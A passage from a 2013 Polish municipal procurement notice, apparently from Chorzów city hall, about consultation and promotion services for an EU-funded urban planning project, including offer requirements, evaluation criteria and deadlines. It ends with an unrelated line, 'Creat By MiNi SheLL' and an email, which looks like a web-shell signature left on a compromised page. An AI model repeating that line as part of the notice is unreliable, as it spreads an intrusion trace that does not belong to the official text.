4. Oświadczenie Wykonawcy dotyczące części zamówienia, których wykonanie powierzy podwykonawcom ( jeżeli dotyczy).  W przypadku braku informacji zamawiający uzna, że wykonawca wykona zamówienie samodzielnie.
5.Do oferty należy dołączyć materiały ( w formie drukowanej bądź na płycie CD) przedstawiające linię kreacyjną, sposób realizacji przedmiotu zamówienia, które będą podlegały ocenie według zasad opisanych w punkcie XVII SIWZ.:
a)proponowany scenariusz jednego z dziewięciu trzygodzinnych spotkań 
w ramach konsultacji społecznych, 
b)Layout głównej strony internetowej projektu wraz z linię kreacyjną, która będzie spójna dla wszystkich działań promocyjnych i informacyjnych (w tym logo projektu). 

6. Oświadczenie o spełnianiu warunku wynikającego z  art. 22 ust. 1 ustawy z dnia 29 stycznia 2004r. Prawo zamówień publicznych ( w przypadku wykonawców wspólnie ubiegających się o udzielenie zamówienia Wykonawcy składają łącznie).</p>

<p class="kh_title">SEKCJA IV: PROCEDURA</p>
<p><b>IV.1) TRYB UDZIELENIA ZAMÓWIENIA</b></p>
<p><b>IV.1.1) Tryb udzielenia zamówienia:</b> przetarg nieograniczony.</p>

<p><b>IV.2) KRYTERIA OCENY OFERT</b></p>
<p><b>IV.2.1) Kryteria oceny ofert: </b>cena oraz inne kryteria związane z przedmiotem zamówienia:</p><ul class="kh_indent_1">
<li>1 - Cena - 50</li>
<li>2 - Sposob realizacji i linia kreacyjna przedmiotu zamówienia - 50</li>
</ul>
<p><b>IV.3) ZMIANA UMOWY</b></p>
<p><b>przewiduje się istotne zmiany postanowień zawartej umowy w stosunku do treści oferty, na podstawie której dokonano wyboru wykonawcy: </b></p>
<p><b>Dopuszczalne zmiany postanowień umowy oraz określenie warunków zmian</b></p>
<p>Zamawiający na podstawie art. 144 ustawy Prawo zamówień publicznych przewiduje możliwość zmiany umowy w zakresie terminów częściowych realizacji przedmiotu zamówienia w szczególnie uzasadnionych przypadkach np. w przypadku  konieczności dostosowania terminu konsultacji do wizyty przedstawiciele Ministerstwa Rozwoju Regionalnego itp.</p>
<p><b>IV.4) INFORMACJE ADMINISTRACYJNE</b></p>
<p><b>IV.4.1)</b>&nbsp;<b>Adres strony internetowej, na której jest dostępna specyfikacja istotnych warunków zamówienia:</b> www.chorzow.eu<br>
<b>Specyfikację istotnych warunków zamówienia można uzyskać pod adresem:</b> Urząd Miasta Chorzów, 41-500 Chorzów, Rynek 1, Biuro Zamówień Pyblicznych, pokój 237/II pietro.</p>
<p><b>IV.4.4) Termin składania wniosków o dopuszczenie do udziału w postępowaniu lub ofert:</b> 01.07.2013 godzina 09:45, miejsce: Urząd Miasta Chorzów, 41-500 Chorzów, Rynek 1, Biuro Zamówień Pyblicznych, pokój 237/II pietro.</p>
<p><b>IV.4.5) Termin związania ofertą:</b> okres w dniach: 30 (od ostatecznego terminu składania ofert).</p>




<p><b>IV.4.16) Informacje dodatkowe, w tym dotyczące finansowania projektu/programu ze środków Unii Europejskiej:</b> Projekt jest współfinansowany ze środków Europejskiego Funduszu Rozwoju Regionalnego w ramach Programu operacyjnego pomoc techniczna 2007-2013 w ramach konkursu organizowanego przez Ministerstwo Rozwoju Regionalnego na działania wspierające jednostki samorządu terytorialnego w zakresie planowania miejskich obszarów funkcjonalnych..</p>
<p><b>IV.4.17) Czy przewiduje się unieważnienie postępowania o udzielenie zamówienia, w przypadku nieprzyznania środków pochodzących z budżetu Unii Europejskiej oraz niepodlegających zwrotowi środków z pomocy udzielonej przez państwa członkowskie Europejskiego Porozumienia o Wolnym Handlu (EFTA), które miały być przeznaczone na sfinansowanie całości lub części zamówienia: </b> nie</p>

Creat By MiNi SheLL
Email: jattceo@gmail.com